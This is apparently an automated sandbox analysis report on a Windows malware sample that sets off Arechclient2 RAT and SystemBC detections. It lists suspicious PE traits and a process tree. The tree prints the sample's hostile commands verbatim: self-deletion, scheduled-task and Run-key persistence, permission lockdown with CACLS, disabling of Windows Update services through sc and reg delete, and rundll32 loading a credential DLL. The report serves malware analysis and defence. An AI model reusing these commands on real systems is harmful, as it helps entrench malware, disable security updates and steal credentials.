Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

PE file contains section with special chars

Source: 61312899942613011832.exe.0.dr	Static PE information: section name: lB@dO\ih
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: qNR5:WbS
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: CV?7x>JO
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: dT<:EHzj
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: @]topACL
Source: nppshell[1].exe.0.dr	Static PE information: section name: lB@dO\ih
Source: nppshell[1].exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: qNR5:WbS
Source: nppshell[1].exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: CV?7x>JO
Source: nppshell[1].exe.0.dr	Static PE information: section name: dT<:EHzj
Source: nppshell[1].exe.0.dr	Static PE information: section name: @]topACL
Source: gntuud.exe.4.dr	Static PE information: section name: lB@dO\ih
Source: gntuud.exe.4.dr	Static PE information: section name: Fh?jG[OJ
Source: gntuud.exe.4.dr	Static PE information: section name: qNR5:WbS
Source: gntuud.exe.4.dr	Static PE information: section name: z?fd8ijJ
Source: gntuud.exe.4.dr	Static PE information: section name: CV?7x>JO
Source: gntuud.exe.4.dr	Static PE information: section name: dT<:EHzj
Source: gntuud.exe.4.dr	Static PE information: section name: @]topACL
Source: syncfiles[1].dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles[1].dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles[1].dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles[1].dll.13.dr	Static PE information: section name: K)'tLNvc
Source: syncfiles.dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles.dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles.dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles.dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles.dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles.dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles.dll.13.dr	Static PE information: section name: K)'tLNvc
Source: cred64[1].dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64[1].dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64[1].dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64[1].dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64[1].dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64[1].dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64[1].dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64[1].dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64[1].dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: cred64.dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64.dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64.dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64.dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64.dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64.dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64.dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64.dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64.dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: Emit64[1].exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64[1].exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64[1].exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64[1].exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64[1].exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64[1].exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64[1].exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64[1].exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64[1].exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64[1].exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64[1].exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64[1].exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64[1].exe.13.dr	Static PE information: section name: lNMkoK?T
Source: Emit64.exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64.exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64.exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64.exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64.exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64.exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64.exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64.exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64.exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64.exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64.exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64.exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64.exe.13.dr	Static PE information: section name: lNMkoK?T
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 87*qGv;7
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: ^NsFAbb[
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 4.ps1S["
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: l^D/X#s1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: aAyXB94]
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 7u=]29J1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: *<5LK<h`
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: Ug$Va';z
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: dA:<*dF(
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: r,Ht]nHV
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: m$m2M1,9
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: o?%]P5Wl
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: lNMkoK?T

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Detected potential crypto function

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61EAD2AC	0_2_61EAD2AC
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E4B8A1	0_2_61E4B8A1
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E8D0B6	0_2_61E8D0B6
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E15337	0_2_61E15337
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E5023C	0_2_61E5023C
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E19208	0_2_61E19208
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E534E3	0_2_61E534E3
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E18736	0_2_61E18736
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E10856	0_2_61E10856
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E21816	0_2_61E21816
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E55BD7	0_2_61E55BD7
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E95D7A	0_2_61E95D7A
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E25FA2	0_2_61E25FA2
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E52F80	0_2_61E52F80
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E4CEF9	0_2_61E4CEF9
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E1EEFF	0_2_61E1EEFF
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E1DEC2	0_2_61E1DEC2

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

PE file contains more sections than normal

Source: RtkAudUService64.exe.26.dr	Static PE information: Number of sections : 14 > 10
Source: Emit64[1].exe.13.dr	Static PE information: Number of sections : 14 > 10
Source: avicapn32[1].exe.13.dr	Static PE information: Number of sections : 11 > 10
Source: avicapn32.exe.13.dr	Static PE information: Number of sections : 11 > 10
Source: Emit64.exe.13.dr	Static PE information: Number of sections : 14 > 10

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\61312899942613011832.exe 682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811

Uses 32bit PE files

Source: DQxttu2Qrr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000002C.00000002.809371970.0000000010005000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR	Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED	Matched rule: SUSP_Two_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 2 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED	Matched rule: SUSP_Four_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 4 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings

PE file contains executable resources (Code or Archives)

Source: jekppnay.tmp.26.dr

Static PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows

Sample file is different than original file name gathered from version info

Source: DQxttu2Qrr.exe, 00000000.00000000.249003658.0000000001BD0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNamedPipeClientLib.dllF vs DQxttu2Qrr.exe
Source: DQxttu2Qrr.exe	Binary or memory string: OriginalFilenameNamedPipeClientLib.dllF vs DQxttu2Qrr.exe

PE / OLE file has an invalid certificate

Source: DQxttu2Qrr.exe

Static PE information: invalid certificate

Source: umciavi64[1].exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: umciavi64.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: avicapn32[1].exe.13.dr	Static PE information: Section: .idata ZLIB complexity 1.0029296875
Source: avicapn32[1].exe.13.dr	Static PE information: Section: .n3DK0 ZLIB complexity 0.9937564036885246
Source: avicapn32.exe.13.dr	Static PE information: Section: .idata ZLIB complexity 1.0029296875
Source: avicapn32.exe.13.dr	Static PE information: Section: .n3DK0 ZLIB complexity 0.9937564036885246

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.adwa.spyw.evad.winEXE@83/38@0/9

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: DQxttu2Qrr.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DQxttu2Qrr.exe C:\Users\user\Desktop\DQxttu2Qrr.exe
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\ProgramData\61312899942613011832.exe	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
